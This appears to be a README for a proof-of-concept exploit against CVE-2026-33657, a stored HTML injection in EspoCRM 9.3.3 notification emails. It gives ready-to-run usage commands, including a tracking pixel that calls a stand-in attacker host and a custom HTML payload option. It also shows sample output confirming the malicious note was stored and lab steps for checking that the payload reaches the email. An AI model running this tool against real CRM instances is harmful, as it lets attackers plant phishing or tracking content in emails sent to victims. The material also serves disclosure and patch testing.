Share
## https://sploitus.com/exploit?id=9CC09B00-098C-5B90-82A6-E55F0B6AEA64
# CVE-2026-33657 - EspoCRM 9.3.3 Stored HTML Injection in Email Notifications

Authenticated proof-of-concept for stored HTML injection in EspoCRM 9.3.3 email notifications.

## Summary

EspoCRM 9.3.3 renders stream-note notification emails by transforming the note body with Markdown and inserting the resulting HTML into email templates with triple braces (`{{{post}}}`). An authenticated user who can create a stream post and trigger a notification can store attacker-controlled HTML that is later rendered in the generated email body.

The exploit performs the attacker-controlled remote portion of the flow:

1. Authenticates to EspoCRM.
2. Optionally fingerprints the version with `/api/v1/App/user`.
3. Creates a malicious `Note` containing HTML.
4. Uses `--mention` or `--target-user-id` to queue a notification target.
5. Confirms the payload is stored and the notification target is present in the API response.

Email delivery occurs when EspoCRM's normal `SendEmailNotifications` job or cron processes the queued notification.

## Affected Version

- Vulnerable: EspoCRM 9.3.3
- Fixed: EspoCRM 9.3.4
- Advisory: https://github.com/espocrm/espocrm/security/advisories/GHSA-8prm-r5j9-j574
- CVE: CVE-2026-33657
- CWE: CWE-80

## Requirements

- Python 3
- `requests`
- Valid EspoCRM credentials
- Ability to create stream `Note` records
- A notification target:
  - `--mention ` for mention email notifications, or
  - `--target-user-id ` for targeted stream-post notifications

Install dependency:

```bash
python3 -m pip install requests
```

## Usage

Preferred mention-based path:

```bash
python3 CVE-2026-33657.py \
  -u http://127.0.0.1:8083 \
  -U testuser \
  -P 'Admin12345!' \
  --mention admin
```

Use a custom tracking URL:

```bash
python3 CVE-2026-33657.py \
  -u https://target.example \
  -U user \
  -P 'password' \
  --mention victim \
  --tracking-url https://attacker.example/pixel.gif
```

Use a fully custom HTML payload:

```bash
python3 CVE-2026-33657.py \
  -u https://target.example \
  -U user \
  -P 'password' \
  --mention victim \
  --payload 'open'
```

Target a specific user id instead of a mention:

```bash
python3 CVE-2026-33657.py \
  -u https://target.example \
  -U user \
  -P 'password' \
  --target-user-id 0123456789abcdef0 \
  --target-user-name 'Victim User'
```

Fingerprint only, without creating a note:

```bash
python3 CVE-2026-33657.py \
  -u https://target.example \
  -U user \
  -P 'password' \
  --detect-only
```

## Options

```text
-u, --url                 Base EspoCRM URL
-U, --username            EspoCRM username
-P, --password            EspoCRM password
--mention                 Username to mention, without @
--target-user-id          User id for targeted stream-post notifications
--target-user-name        Display name for --target-user-id
--payload                 Raw HTML payload to store in the Note
--tracking-url            Tracking pixel URL used by the default payload
--link-url                Link URL used by the default payload
--marker                  Marker text prepended to the payload
--detect-only             Fingerprint version only; do not create a Note
--skip-version-check      Skip /api/v1/App/user before exploitation
--force                   Continue even if version fingerprint is not 9.3.3
--insecure                Disable TLS certificate verification
```

## Expected Output

A successful run creates a malicious note and confirms the notification target:

```text
[*] /api/v1/App/user: HTTP 200
[*] Detected version: 9.3.3
[+] Version fingerprint is vulnerable: EspoCRM 9.3.3.
[*] Creating malicious Note as testuser
[*] Note response: HTTP 200 ...
[+] Exploit payload stored in Note post.
[+] Note id: 69fddeef8db756271
[+] Mention parsed: @admin -> user id 69fdcfb66c34ccb81
[+] Notification target list returned by API: 69fdcfb66c34ccb81
[+] Complete remote trigger submitted.
```

On a vulnerable instance, the generated HTML email body preserves the injected HTML. A lab capture looks like:

```html

re-auth
```

## Lab Verification

In a local EspoCRM lab, after running the exploit, trigger the notification job:

```bash
sudo -u www-data php command.php run-job SendEmailNotifications
```

The resulting email body should contain the injected HTML in the `text/html` part.

## Notes

- The exploit does not need shell access to the target; shell access is only useful for local lab verification of the queued email job.
- If the API reports `@@version`, the target is likely a source-tree build. The script continues because the underlying code may still be the vulnerable 9.3.3 tag.
- If `--mention` does not produce a parsed mention, check the attacker's `messagePermission` and `mentionPermission`, and confirm that the target username exists and can receive notifications.